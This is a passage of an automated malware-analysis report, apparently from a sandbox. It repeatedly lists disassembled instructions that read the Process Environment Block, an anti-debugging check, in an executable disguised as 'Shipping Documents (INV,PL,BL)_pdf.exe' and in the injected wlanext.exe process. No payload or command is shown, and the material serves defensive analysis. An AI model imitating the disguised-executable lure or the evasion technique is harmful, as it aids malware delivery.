      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]1_2_1E426C0A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47740D mov eax, dword ptr fs:[00000030h]1_2_1E47740D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47740D mov eax, dword ptr fs:[00000030h]1_2_1E47740D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47740D mov eax, dword ptr fs:[00000030h]1_2_1E47740D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C746D mov eax, dword ptr fs:[00000030h]1_2_1E3C746D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E474015 mov eax, dword ptr fs:[00000030h]1_2_1E474015
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E474015 mov eax, dword ptr fs:[00000030h]1_2_1E474015
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427016 mov eax, dword ptr fs:[00000030h]1_2_1E427016
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427016 mov eax, dword ptr fs:[00000030h]1_2_1E427016
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427016 mov eax, dword ptr fs:[00000030h]1_2_1E427016
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C0050 mov eax, dword ptr fs:[00000030h]1_2_1E3C0050
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C0050 mov eax, dword ptr fs:[00000030h]1_2_1E3C0050
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA44B mov eax, dword ptr fs:[00000030h]1_2_1E3DA44B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]1_2_1E3DF0BF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]1_2_1E3DF0BF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]1_2_1E3DF0BF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478CD6 mov eax, dword ptr fs:[00000030h]1_2_1E478CD6
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E90AF mov eax, dword ptr fs:[00000030h]1_2_1E3E90AF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]1_2_1E43B8D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]1_2_1E43B8D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]1_2_1E43B8D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]1_2_1E43B8D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]1_2_1E43B8D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]1_2_1E43B8D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B849B mov eax, dword ptr fs:[00000030h]1_2_1E3B849B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426CF0 mov eax, dword ptr fs:[00000030h]1_2_1E426CF0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426CF0 mov eax, dword ptr fs:[00000030h]1_2_1E426CF0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426CF0 mov eax, dword ptr fs:[00000030h]1_2_1E426CF0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9080 mov eax, dword ptr fs:[00000030h]1_2_1E3A9080
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4614FB mov eax, dword ptr fs:[00000030h]1_2_1E4614FB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E423884 mov eax, dword ptr fs:[00000030h]1_2_1E423884
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E423884 mov eax, dword ptr fs:[00000030h]1_2_1E423884
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A58EC mov eax, dword ptr fs:[00000030h]1_2_1E3A58EC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E423540 mov eax, dword ptr fs:[00000030h]1_2_1E423540
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]1_2_1E3D4D3B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]1_2_1E3D4D3B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]1_2_1E3D4D3B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D513A mov eax, dword ptr fs:[00000030h]1_2_1E3D513A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D513A mov eax, dword ptr fs:[00000030h]1_2_1E3D513A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]1_2_1E3AAD30
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]1_2_1E3B3D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]1_2_1E3A9100
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]1_2_1E3A9100
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]1_2_1E3A9100
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB171 mov eax, dword ptr fs:[00000030h]1_2_1E3AB171
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB171 mov eax, dword ptr fs:[00000030h]1_2_1E3AB171
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC577 mov eax, dword ptr fs:[00000030h]1_2_1E3CC577
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC577 mov eax, dword ptr fs:[00000030h]1_2_1E3CC577
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AC962 mov eax, dword ptr fs:[00000030h]1_2_1E3AC962
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]1_2_1E3C7D50
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478D34 mov eax, dword ptr fs:[00000030h]1_2_1E478D34
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E42A537 mov eax, dword ptr fs:[00000030h]1_2_1E42A537
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CB944 mov eax, dword ptr fs:[00000030h]1_2_1E3CB944
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CB944 mov eax, dword ptr fs:[00000030h]1_2_1E3CB944
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]1_2_1E3E3D43
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46E539 mov eax, dword ptr fs:[00000030h]1_2_1E46E539
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]1_2_1E3D1DB5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]1_2_1E3D1DB5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]1_2_1E3D1DB5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]1_2_1E426DC9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]1_2_1E426DC9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]1_2_1E426DC9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]1_2_1E426DC9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]1_2_1E426DC9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]1_2_1E426DC9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]1_2_1E3D35A1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D61A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]1_2_1E3D61A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E46FDE2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E46FDE2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E46FDE2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E46FDE2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]1_2_1E3DFD9B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]1_2_1E3DFD9B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4341E8 mov eax, dword ptr fs:[00000030h]1_2_1E4341E8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2990 mov eax, dword ptr fs:[00000030h]1_2_1E3D2990
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]1_2_1E3A2D8A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]1_2_1E3A2D8A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]1_2_1E3A2D8A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]1_2_1E3A2D8A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]1_2_1E3A2D8A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E458DF1 mov eax, dword ptr fs:[00000030h]1_2_1E458DF1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA185 mov eax, dword ptr fs:[00000030h]1_2_1E3DA185
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]1_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]1_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]1_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]1_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC182 mov eax, dword ptr fs:[00000030h]1_2_1E3CC182
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]1_2_1E3AB1E1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]1_2_1E3AB1E1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]1_2_1E3AB1E1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]1_2_1E3BD5E0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]1_2_1E3BD5E0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4269A6 mov eax, dword ptr fs:[00000030h]1_2_1E4269A6
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4705AC mov eax, dword ptr fs:[00000030h]1_2_1E4705AC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4705AC mov eax, dword ptr fs:[00000030h]1_2_1E4705AC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]1_2_1E4251BE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]1_2_1E4251BE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]1_2_1E4251BE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]1_2_1E4251BE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00567C4F mov eax, dword ptr fs:[00000030h]1_2_00567C4F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00566CF0 mov eax, dword ptr fs:[00000030h]1_2_00566CF0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005641FB mov eax, dword ptr fs:[00000030h]1_2_005641FB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005689EE mov eax, dword ptr fs:[00000030h]1_2_005689EE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005689EB mov eax, dword ptr fs:[00000030h]1_2_005689EB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568A85 mov eax, dword ptr fs:[00000030h]1_2_00568A85
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8B58 mov eax, dword ptr fs:[00000030h]11_2_035D8B58
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350F358 mov eax, dword ptr fs:[00000030h]11_2_0350F358
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350DB40 mov eax, dword ptr fs:[00000030h]11_2_0350DB40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03533B7A mov eax, dword ptr fs:[00000030h]11_2_03533B7A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03533B7A mov eax, dword ptr fs:[00000030h]11_2_03533B7A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350DB60 mov ecx, dword ptr fs:[00000030h]11_2_0350DB60
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C131B mov eax, dword ptr fs:[00000030h]11_2_035C131B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035853CA mov eax, dword ptr fs:[00000030h]11_2_035853CA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035853CA mov eax, dword ptr fs:[00000030h]11_2_035853CA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]11_2_035303E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]11_2_035303E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]11_2_035303E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]11_2_035303E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]11_2_035303E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]11_2_035303E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352DBE9 mov eax, dword ptr fs:[00000030h]11_2_0352DBE9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353B390 mov eax, dword ptr fs:[00000030h]11_2_0353B390
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532397 mov eax, dword ptr fs:[00000030h]11_2_03532397
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C138A mov eax, dword ptr fs:[00000030h]11_2_035C138A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BD380 mov ecx, dword ptr fs:[00000030h]11_2_035BD380
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03511B8F mov eax, dword ptr fs:[00000030h]11_2_03511B8F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03511B8F mov eax, dword ptr fs:[00000030h]11_2_03511B8F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D5BA5 mov eax, dword ptr fs:[00000030h]11_2_035D5BA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]11_2_03534BAD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]11_2_03534BAD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]11_2_03534BAD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CEA55 mov eax, dword ptr fs:[00000030h]11_2_035CEA55
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03594257 mov eax, dword ptr fs:[00000030h]11_2_03594257
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]11_2_03509240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]11_2_03509240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]11_2_03509240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]11_2_03509240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354927A mov eax, dword ptr fs:[00000030h]11_2_0354927A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BB260 mov eax, dword ptr fs:[00000030h]11_2_035BB260
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BB260 mov eax, dword ptr fs:[00000030h]11_2_035BB260
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8A62 mov eax, dword ptr fs:[00000030h]11_2_035D8A62
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]11_2_03505210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov ecx, dword ptr fs:[00000030h]11_2_03505210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]11_2_03505210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]11_2_03505210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AA16 mov eax, dword ptr fs:[00000030h]11_2_0350AA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AA16 mov eax, dword ptr fs:[00000030h]11_2_0350AA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAA16 mov eax, dword ptr fs:[00000030h]11_2_035CAA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAA16 mov eax, dword ptr fs:[00000030h]11_2_035CAA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03523A1C mov eax, dword ptr fs:[00000030h]11_2_03523A1C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03518A0A mov eax, dword ptr fs:[00000030h]11_2_03518A0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03544A2C mov eax, dword ptr fs:[00000030h]11_2_03544A2C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03544A2C mov eax, dword ptr fs:[00000030h]11_2_03544A2C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
